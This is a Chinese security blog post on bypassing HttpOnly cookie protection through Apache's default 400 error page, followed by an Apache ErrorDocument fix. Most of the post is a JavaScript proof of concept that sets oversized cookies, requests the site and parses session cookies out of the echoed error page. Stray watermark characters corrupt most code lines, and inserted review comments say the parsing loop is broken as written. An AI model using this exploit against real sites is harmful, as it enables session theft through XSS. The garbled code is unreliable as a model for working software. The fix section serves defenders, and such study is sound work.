很多程序以及一些商业或成熟开源的CMS文章系统，为了防止XSS盗取用户cookie，一般都会给cookie加上HttpOnly属性，禁止直接用JS读取用户的cookie，从而降低XSS的危害；而本文所述的问题刚好可以用来绕过cookie的HttpOnly属性。
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442
/**
 * Sets (or, with `good` truthy, expires) ten padding cookies named xss0..xss9.
 *
 * Each padding cookie carries 819 "x" characters, so the next request to the
 * site sends roughly 8 KB of Cookie header; the post relies on the server
 * rejecting that request with a 400 whose default error page echoes the
 * request headers (see makeRequest / parseCookies below). The exact size
 * limit being exceeded is not stated on this page — presumably the server's
 * request-header size limit; confirm against the server in question.
 *
 * Defender's note: HttpOnly itself is not defeated here; the leak comes from
 * the default 400 page echoing the request. The post's fix (a custom
 * ErrorDocument 400, or upgrading Apache) removes the echo.
 *
 * The stray character runs on the lines below are forum anti-copy watermark
 * noise from the original paste, not part of the script.
 *
 * @param {boolean} [good] - truthy: expire the padding cookies (cleanup);
 *   falsy/undefined: set them.
 */
function setCookies (good) {
" U: F1 G" p7 `7 J6 r7 J2 o/ { @// Construct string for cookie value; ^: y- k( k: F0 q# l: G) i) O
var str = "";
// 819 bytes of filler per cookie; ten cookies are set below
, O2 |. S5 a0 I8 G* Y' i0 h% afor (var i=0; i< 819; i++) {
' q# d1 [% K4 l& N& ?; H0 Q& pstr += "x";8 C8 ?- t4 j' F1 g8 y! Y2 l5 k2 p& a
}
; \- T- k4 A0 D, p// Set cookies0 L: f$ \( `7 K0 N8 G5 N. A- m
// Note: `i` is reused without `var`; it is the same function-scoped variable as above
for (i = 0; i < 10; i++) {. q, l+ k. |; s! D' u7 ?: o
// Expire evil cookie9 z7 @* ^! d; v
if (good) {
// Expiry one millisecond in the past so the browser drops the cookie immediately
- ]. ^! K4 a* h1 \var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
9 a$ r. t1 \. [6 o" t}
% j% M; b4 W9 i// Set evil cookie5 P Y7 y/ w8 d: X
else {
) c2 R1 Y, F. ?0 k0 qvar cookie = "xss"+i+"="+str+";path=/";
8 t" c! A& Z. _9 l}2 v( l! B C4 R
// Writing document.cookie adds (or replaces) one cookie; existing cookies are untouched
document.cookie = cookie;
\' ~, k# |6 Z/ b) d, L$ X}
4 L" k5 n1 R5 p# S9 \8 r}
/**
 * Runs the demo once: sets the padding cookies, requests "/" via XHR and, when
 * the server answers 400, parses the echoed Cookie header out of the error
 * page's <pre> block and shows it with alert().
 *
 * What this demonstrates for a defender: the only thing read back is the
 * server's own 400 error body, so the response page content, not the cookie
 * flag, is the control point (see the ErrorDocument fix later in the post).
 *
 * The stray character runs on the lines below are forum watermark noise from
 * the original paste, not part of the script.
 */
1 J/ v5 @! I/ J, }function makeRequest() {
// Set the ten oversized xssN cookies before the request goes out
. \6 r( p6 N2 T& TsetCookies();
// readyState handler; `xhr` is the hoisted var declared further down and is
// assigned before send(), so it is defined by the time this runs
1 Q7 I* G$ a4 Z8 afunction parseCookies () {( C# V t: c) G ~, S6 @, f, A1 X
var cookie_dict = {};
$ T- C. w' u M9 `+ @) w// Only react on 400 status( z( e6 W# s2 d! u, q2 e
if (xhr.readyState === 4 && xhr.status === 400) {
G Y+ V6 T3 D, V// Replace newlines and match <pre> content
) e/ U' n4 d4 e3 ]var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);# o1 {* \: q) [6 `0 [& y
// NOTE(review): match() returns null when the body has no <pre> block (e.g. a
// custom ErrorDocument), so `content.length` throws a TypeError in that case
if (content.length) {3 B% h" T; Y; d; c# F
// Remove Cookie: prefix+ J% M1 u1 C, |% A
content = content[1].replace("Cookie: ", "");! M2 `* b `9 N: e
// Drop the xssN padding cookies, then split the rest into name=value pairs
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);8 {9 {" ^' x; i( K8 ^% B
// Add cookies to object
) B7 n- B4 D: Rfor (var i=0; i<cookies.length; i++) {3 J6 u; F/ \1 G# k- Y
// NOTE(review): `cookies` is the array produced by split() above; arrays have no
// split() method, so this line throws a TypeError as written and cookie_dict
// is never populated
var s_c = cookies.split('=',2);4 O5 h: K/ H5 h" ^1 g6 c( S, c% o
cookie_dict[s_c[0]] = s_c[1];
5 d+ w4 v+ F- H; z# D0 x/ H. w}- c6 ^# z/ s. A8 {3 x7 m" }1 A
}3 d$ ^! b0 Q+ M& l/ u$ g+ y
// Unset malicious cookies
# b4 @- X- f$ s) H, QsetCookies(true);$ D) F0 G# n# W9 m; ^
// Demo output only: the parsed pairs are displayed locally in the console session
alert(JSON.stringify(cookie_dict));( ?2 H- Y* T. Q$ h9 E' ]
}
0 X i( e9 S. |3 G$ h" t; w+ t}
) C, t; N5 k! F$ P/ X+ c2 r// Make XHR request
// Same-origin GET of "/"; the browser attaches all cookies for the site,
// including the padding set above
' O- N s# k8 `var xhr = new XMLHttpRequest();5 R( G' r3 C# U/ `
xhr.onreadystatechange = parseCookies;8 `! M& l+ x) ]$ b+ P
xhr.open("GET", "/", true);
+ {2 k! Y8 U% bxhr.send(null);6 q! F1 T7 }# Y) I
}
// Entry point: run the demo once when the snippet is pasted into the console
* V$ \& c1 x3 n1 q5 l6 fmakeRequest();
你就能看见华丽丽的400错误页面中包含着cookie信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案:
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message 输出一个简单生硬的错误代码信息
2. output a customized message 输出一段自定义的信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL
经测试,对于400错误只有方法2有效:自定义的错误信息替换了默认的400页面(默认页面会在<pre>中原样回显出错的请求头,包括Cookie头),返回包不会再包含cookie内容。
Apache配置:
ErrorDocument 400 "security test"
当然,升级apache到最新也可:)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html